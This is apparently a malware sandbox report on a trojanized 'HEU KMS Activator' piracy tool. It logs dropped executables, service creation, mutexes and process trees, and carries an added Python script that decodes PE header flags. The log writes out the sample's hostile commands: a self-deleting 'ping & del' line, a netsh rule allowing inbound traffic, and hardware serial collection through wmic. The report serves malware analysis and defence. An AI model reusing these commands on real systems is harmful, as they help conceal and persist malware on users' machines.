Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\Office2010OSPP
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\OtherOfficeOSPP
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\ewm_wx.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\ewm_zfb.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\head.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\left.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\office.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\shuoming.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\Windows.jpg
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\backup.bmp
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\restore.bmp
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\amt.ico
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\ver.ico
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\pic\zanzhu.ico
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\HEU_KMS_Renewal.xml
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\Office2010OSPP\SLERROR.XML
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\OtherOfficeOSPP\slerror.xml
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\SvcTrigger.xml
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\Office2010OSPP\OSPP.VBS
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\OtherOfficeOSPP\OSPP.VBS
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\HEU_Configuration.ini
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\GetProductKey.data
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\SetupComplete.data
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms-client.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms-server.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms_x64.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\msvcr100.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SECOPatcher.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SECOPatcher.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\_temp07242019502489\ScriptDir.ini
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File deleted: C:\Windows\System32\drivers\DvLayout.exe
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00456CF034_2_00456CF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00434D2834_2_00434D28
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00466E3034_2_00466E30
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045105034_2_00451050
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044715034_2_00447150
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045917034_2_00459170
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004311FE34_2_004311FE
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046722034_2_00467220
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046F31434_2_0046F314
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044946034_2_00449460
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046742034_2_00467420
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004514F034_2_004514F0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004075F534_2_004075F5
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045374034_2_00453740
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004677D034_2_004677D0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004217DA34_2_004217DA
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044192534_2_00441925
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0042DBB634_2_0042DBB6
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00453CE034_2_00453CE0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00467DF034_2_00467DF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00459E7034_2_00459E70
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044BED034_2_0044BED0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00461EF034_2_00461EF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045FE9034_2_0045FE90
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00459F8034_2_00459F80
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Code function: String function: 00405EFF appears 56 times
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: String function: 0037C240 appears 49 times
Source: C:\Windows\_temp07242019502489\7Z.EXE | Code function: String function: 0046B890 appears 624 times
Source: C:\Windows\_temp07242019502489\7Z.EXE | Code function: String function: 00407A18 appears 114 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C39A90 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C21F00 appears 253 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C27CA0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C8AB00 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C80610 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C22050 appears 379 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: String function: 00C8F810 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 00667CA0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 00679A90 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 00661F00 appears 252 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 00667C80 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 006CAB00 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 00662050 appears 379 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 006C0610 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: String function: 006CF810 appears 49 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00EAEAC0 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E83110 appears 32 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E7F7B0 appears 328 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E844B0 appears 39 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E7F890 appears 265 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E84670 appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00E83060 appears 50 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: String function: 00EB5660 appears 55 times
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDvLayout.exe8 vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2510572326.0000000001B27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000003.1303436049.000000000BEE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7za.exe, vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME^5 vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000003.1303436049.000000000BEB1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7za.exe, vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe.4.dr | Binary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe.1.dr | Binary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: KMDF_LOOK.sys.1.dr | Binary string: \Device\KMDF1L@UH
Source: classification engine | Classification label: mal100.troj.evad.winEXE@64/79@5/5
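The static PE flags reported for the sample (RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE) are a direct decoding of IMAGE_FILE_HEADER.Characteristics. The Python below is an editor's added example, not part of the Joe Sandbox report and not code from the sample: it decodes that field together with the optional header's DllCharacteristics and derives the check a triager actually cares about, namely that an image with RELOCS_STRIPPED carries no relocation table, so ASLR cannot rebase it even when DYNAMIC_BASE is set. The build_stub() helper fabricates a header-only byte string for testing; it is not the analysed binary, and its default 0x0103 value is chosen only to reproduce the three flags listed above.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h IMAGE_FILE_*)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x1000: "SYSTEM",
    0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h IMAGE_DLLCHARACTERISTICS_*)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
}
MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}


def _flags(table, value):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_header(data: bytes) -> dict:
    """Decode the COFF file header and DllCharacteristics of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0] if opt_size >= 2 else 0
    # DllCharacteristics sits at offset 70 in both PE32 (0x10B) and PE32+ (0x20B)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0] if opt_size >= 72 else 0
    file_flags = _flags(FILE_CHARACTERISTICS, chars)
    dll_flags = _flags(DLL_CHARACTERISTICS, dll_chars)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "pe32plus": magic == 0x20B,
        "sections": nsections,
        "characteristics": file_flags,
        "dll_characteristics": dll_flags,
        # ASLR needs both the opt-in bit and a relocation table to apply it with
        "aslr_effective": "DYNAMIC_BASE" in dll_flags and "RELOCS_STRIPPED" not in file_flags,
    }


def build_stub(characteristics=0x0103, dll_characteristics=0x0000,
               machine=0x014C, nsections=3) -> bytes:
    """Construct a header-only PE byte string for testing; not a runnable program."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0  # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", machine, nsections, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_stub()
    for key, value in parse_pe_header(raw).items():
        print(f"{key:>20}: {value}")
```

Run it against any PE on disk by passing the path as the first argument; with no argument it decodes the constructed stub and reports the same three flags the sandbox printed, plus aslr_effective = False because the relocations are stripped.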
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006A5920 GetLastError,_strncpy,FormatMessageA,_strrchr,_strrchr,GetLastError,SetLastError
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Code function: 1_2_0040425D GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_00641AF0 GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C01AF0 GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: 11_2_003746B0 GetFullPathNameW,OpenSCManagerW,GetLastError,CloseServiceHandle,CreateServiceW,GetLastError,GetLastError,OpenServiceW,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Code function: 1_2_00402483 CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_00641FC0 LoadResource,LockResource,SizeofResource
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_00631D50 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00BF1D60 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | File created: C:\Users\user\AppData\Local\Microsoft\Event Viewer
Source: C:\Windows\System32\drivers\DvLayout.exe | Mutant created: \Sessions\1\BaseNamedObjects\DVLayout
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Mutant created: \Sessions\1\BaseNamedObjects\HEU KMS Activator
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Mutant created: \Sessions\1\BaseNamedObjects\DLreport
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Mutant created: \Sessions\1\BaseNamedObjects\GPTWin10
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | File created: C:\Users\user~1\AppData\Local\Temp\nseB6AE.tmp
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Command line argument: Nmn (2_2_006E6CA0)
Source: C:\Windows\System32\drivers\DvLayout.exe | Command line argument: n9 (11_2_0039DFC0)
Source: HEU_KMS_Activator.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HEU_KMS_Activator.exe | ReversingLabs: Detection: 68%
Source: HEU_KMS_Activator.exe | Virustotal: Detection: 73%
Source: wrme.exe | String found in binary or memory: /install
Source: wrme.exe | String found in binary or memory: -install
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | File read: C:\Users\user\Desktop\HEU_KMS_Activator.exe
Source: unknown | Process created: C:\Users\user\Desktop\HEU_KMS_Activator.exe "C:\Users\user\Desktop\HEU_KMS_Activator.exe"
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Process created: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Process created: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Process created: C:\Windows\System32\drivers\DvLayout.exe "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Windows\System32\drivers\DvLayout.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /h off
Source: C:\Windows\SysWOW64\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\drivers\DvLayout.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\_temp07242019502489\7Z.EXE C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489
Source: C:\Windows\_temp07242019502489\7Z.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\_temp07242019502489\kms_x64.exe C:\Windows\_temp07242019502489\kms_x64.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
